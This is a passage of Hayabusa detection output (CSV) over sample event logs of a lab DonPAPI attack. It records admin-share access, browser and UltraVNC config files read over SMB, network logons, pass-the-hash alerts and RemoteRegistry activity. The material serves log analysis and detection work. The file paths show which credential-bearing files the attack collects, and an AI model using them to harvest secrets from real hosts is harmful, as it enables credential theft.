User\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.002 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.002 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.002 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.002 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.002 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.002 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.017 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.017 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.017 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.017 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.017 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.017 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.017 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.033 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.033 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.033 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.033 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.033 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.033 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.033 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.049 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.049 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.049 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.049 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.049 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.049 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.049 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.064 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.064 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.064 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.064 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.064 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.064 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.080 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.080 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.080 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.080 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.080 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.080 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.080 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.096 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.096 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.096 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.096 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.111 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724935,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.111 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.111 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724935,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.111 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724935,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.111 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724935,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.111 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.127 +00:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724935 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.174 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x872496f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.174 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.174 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x872496f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.174 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x872496f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.174 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x872496f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.174 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.189 +00:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x872496f | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.237 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x87249a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.237 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.237 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x87249a8,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.237 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x87249a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.237 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x87249a8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.237 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.269 +00:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x87249a8 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.300 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: 